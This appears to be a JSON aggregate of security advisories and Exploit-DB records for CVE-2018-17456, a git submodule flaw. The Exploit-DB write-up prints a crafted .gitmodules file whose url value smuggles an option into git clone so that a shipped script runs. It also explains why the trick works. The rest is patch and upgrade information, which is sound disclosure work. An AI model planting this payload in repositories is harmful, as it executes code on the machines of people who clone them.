vulnerability goes to joernchen and Jeff King, respectively.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17456\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/git-2.14.5-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/git-2.14.5-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/git-2.14.5-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/git-2.14.5-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/git-2.14.5-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/git-2.14.5-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/git-2.19.1-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/git-2.19.1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n40f5f0b8654c01cf8c9ea0162481c3d8 git-2.14.5-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n9f55b0f46f910514b7cab522bdb634fc git-2.14.5-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n64a2f53cd09cbab61ee764de43c6c319 git-2.14.5-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n25ac3ee0db49645eb0f2b895c0b23148 git-2.14.5-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n8d4a1a8eb0bc0a62a6520e0b5de14889 git-2.14.5-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n99ab6ab1d4685a81252893db01d63c5a git-2.14.5-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n842760c6310c5ed063d2f590adf390b8 d/git-2.19.1-i586-1.txz\n\nSlackware x86_64 -current 
package:\n0ffa45649ab6ffeb950a7e0eeaf2aa8f d/git-2.19.1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg git-2.14.5-i586-1_slack14.2.txz", "modified": "2018-10-11T00:35:23", "published": "2018-10-11T00:35:23", "id": "SSA-2018-283-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.442862", "type": "slackware", "title": "[slackware-security] git", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-15T01:44:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "It was discovered that git did not properly validate git submodule \nurls or paths. A remote attacker could possibly use this to craft a \ngit repository that causes arbitrary code execution when recursive \noperations are used.", "edition": 5, "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "USN-3791-1", "href": "https://ubuntu.com/security/notices/USN-3791-1", "title": "Git vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "software", "cvelist": ["CVE-2018-17456"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n * Canonical Ubuntu 18.04\n\n# Description\n\nIt was discovered that git did not properly validate git submodule urls or paths. 
A remote attacker could possibly use this to craft a git repository that causes arbitrary code execution when recursive operations are used.\n\nCVEs contained in this USN include: CVE-2018-17456\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.242.0\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.29.0\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.242.0 or later.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.29.0 or later.\n\n# References\n\n * [USN-3791-1](<https://usn.ubuntu.com/3791-1>)\n * [CVE-2018-17456](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-17456>)\n", "edition": 3, "modified": "2018-10-15T00:00:00", "published": "2018-10-15T00:00:00", "id": "CFOUNDRY:9C6EC2561AEF786EE1E3D4A78891A5F8", "href": "https://www.cloudfoundry.org/blog/usn-3791-1/", "title": "USN-3791-1: Git vulnerability | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-10-08T16:29:40", "description": "Git Submodule - Arbitrary Code Execution. CVE-2018-17456. 
Local exploit for Linux platform", "published": "2018-10-05T00:00:00", "type": "exploitdb", "title": "Git Submodule - Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-10-05T00:00:00", "id": "EDB-ID:45548", "href": "https://www.exploit-db.com/exploits/45548/", "sourceData": "These releases fix a security flaw (CVE-2018-17456), which allowed an\r\nattacker to execute arbitrary code by crafting a malicious .gitmodules\r\nfile in a project cloned with --recurse-submodules.\r\n\r\nWhen running \"git clone --recurse-submodules\", Git parses the supplied\r\n.gitmodules file for a URL field and blindly passes it as an argument\r\nto a \"git clone\" subprocess. If the URL field is set to a string that\r\nbegins with a dash, this \"git clone\" subprocess interprets the URL as\r\nan option. This can lead to executing an arbitrary script shipped in\r\nthe superproject as the user who ran \"git clone\".\r\n\r\nIn addition to fixing the security issue for the user running \"clone\",\r\nthe 2.17.2, 2.18.1 and 2.19.1 releases have an \"fsck\" check which can\r\nbe used to detect such malicious repository content when fetching or\r\naccepting a push. See \"transfer.fsckObjects\" in git-config(1).\r\n\r\nCredit for finding and fixing this vulnerability goes to joernchen\r\nand Jeff King, respectively.\r\n\r\nP.S. Folks at Microsoft tried to follow the known exploit recipe on\r\nGit for Windows (but not Cygwin or other Git implementations on\r\nWindows) and found that the recipe (or its variants they can think\r\nof) would not make their system vulnerable. This is due to the fact\r\nthat the type of submodule path required by the known exploit recipe\r\ncannot be created on Windows. 
Nonetheless, it is possible we have\r\nmissed some exploitation path and users are encouraged to upgrade.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45548/"}, {"lastseen": "2018-11-27T20:19:48", "description": "Git Submodule - Arbitrary Code Execution. CVE-2018-17456. Local exploit for Linux platform", "published": "2018-10-16T00:00:00", "type": "exploitdb", "title": "Git Submodule - Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-16T00:00:00", "id": "EDB-ID:45631", "href": "https://old.exploit-db.com/exploits/45631/", "sourceData": "# CVE-2018-17456\r\n\r\nI've gotten a couple of questions about exploitation for the\r\n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we\r\ngo with some technical details.\r\n\r\n## TL;DR\r\n\r\n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.\r\nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip\r\n\r\n## Exploitation\r\n\r\nThe `.gitmodules` file looks as follows:\r\n\r\n```\r\n[submodule \"x:x\"]\r\n\tpath = x:x\r\n\turl = -u./payload\r\n```\r\n\r\nThe actual command being injected is set by the url, `-u./payload`\r\npoints the `upload-pack` flag of git clone to the `payload` shell\r\nscript. 
Note also the `:` within the path, this part is needed to\r\nactually get the `payload` script executed.\r\n\r\nThe path will end up as the repository URL in the subsequent `clone`\r\noperation:\r\n\r\n```\r\nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\",\r\n\"--no-checkout\", \"--progress\", \"--separate-git-dir\",\r\n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],...\r\n```\r\n\r\nAs the actual URL from `.gitmodules` is interpreted as the `-u`\r\nargument.\r\n\r\nThe colon is due to the fact that the colon character lets us go past\r\nthose lines in `transport.c`:\r\n\r\n```c\r\n } else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {\r\n struct bundle_transport_data *data = xcalloc(1, sizeof(*data));\r\n transport_check_allowed(\"file\");\r\n ret->data = data;\r\n ret->vtable = &bundle_vtable;\r\n ret->smart_options = NULL;\r\n```\r\n\r\n`url_is_local_not_ssh` will return false due to the colon\r\nin the path. And therefore later on in the code the smart_options\r\ncontaining the `uploadpack` setting are still in place:\r\n\r\n```c\r\n } else {\r\n\t\t/* Unknown protocol in URL. Pass to external handler. */\r\n\t\tint len = external_specification_len(url);\r\n\t\tchar *handler = xmemdupz(url, len);\r\n\t\ttransport_helper_init(ret, handler);\r\n\t}\r\n\r\n\tif (ret->smart_options) {\r\n\t\tret->smart_options->thin = 1;\r\n\t\tret->smart_options->uploadpack = \"git-upload-pack\";\r\n\t\tif (remote->uploadpack)\r\n\t\t\tret->smart_options->uploadpack = remote->uploadpack;\r\n\t\tret->smart_options->receivepack = \"git-receive-pack\";\r\n\t\tif (remote->receivepack)\r\n\t\t\tret->smart_options->receivepack = remote->receivepack;\r\n\t}\r\n```\r\n\r\n## Further hints\r\n\r\nThe constraint to have a colon in the `path` seems to hinder exploitation on Windows\r\nas a colon is a forbidden character within a path on Windows. 
However as noted by\r\nsome people during the disclosure: Git running within the Windows Subsystem for Linux or\r\ncygwin will allow exploitation on Windows hosts.\r\n\r\nEtienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)\r\nearlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592).", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://old.exploit-db.com/download/45631/"}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Arch Linux Security Advisory ASA-201810-7\n=========================================\n\nSeverity: High\nDate : 2018-10-09\nCVE-ID : CVE-2018-17456\nPackage : git\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-776\n\nSummary\n=======\n\nThe package git before version 2.19.1-1 is vulnerable to arbitrary code\nexecution.\n\nResolution\n==========\n\nUpgrade to 2.19.1-1.\n\n# pacman -Syu \"git>=2.19.1-1\"\n\nThe problem has been fixed upstream in version 2.19.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue has been found in git versions prior to 2.19.1, which\nallows an attacker to execute arbitrary code by crafting a malicious\n.gitmodules file in a project cloned with --recurse-submodules.\nWhen running \"git clone --recurse-submodules\", Git parses the supplied\n.gitmodules file for a URL field and blindly passes it as an argument\nto a \"git clone\" subprocess. If the URL field is set to a string that\nbegins with a dash, this \"git clone\" subprocess interprets the URL as an\noption. 
This can lead to executing an arbitrary script shipped in the\nsuperproject as the user who ran \"git clone\".\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host by\nconvincing a local user to clone a specially crafted git repository and\nits sub-modules.\n\nReferences\n==========\n\nhttps://marc.info/?l=git&m=153875888916397&w=2\nhttps://git.kernel.org/pub/scm/git/git.git/commit/?id=98afac7a7cefdca0d2c4917dd8066a59f7088265\nhttps://git.kernel.org/pub/scm/git/git.git/commit/?id=f6adec4e329ef0e25e14c63b735a5956dc67b8bc\nhttps://git.kernel.org/pub/scm/git/git.git/commit/?id=273c61496f88c6495b886acb1041fe57965151da\nhttps://security.archlinux.org/CVE-2018-17456", "modified": "2018-10-09T00:00:00", "published": "2018-10-09T00:00:00", "id": "ASA-201810-7", "href": "https://security.archlinux.org/ASA-201810-7", "type": "archlinux", "title": "[ASA-201810-7] git: arbitrary code execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}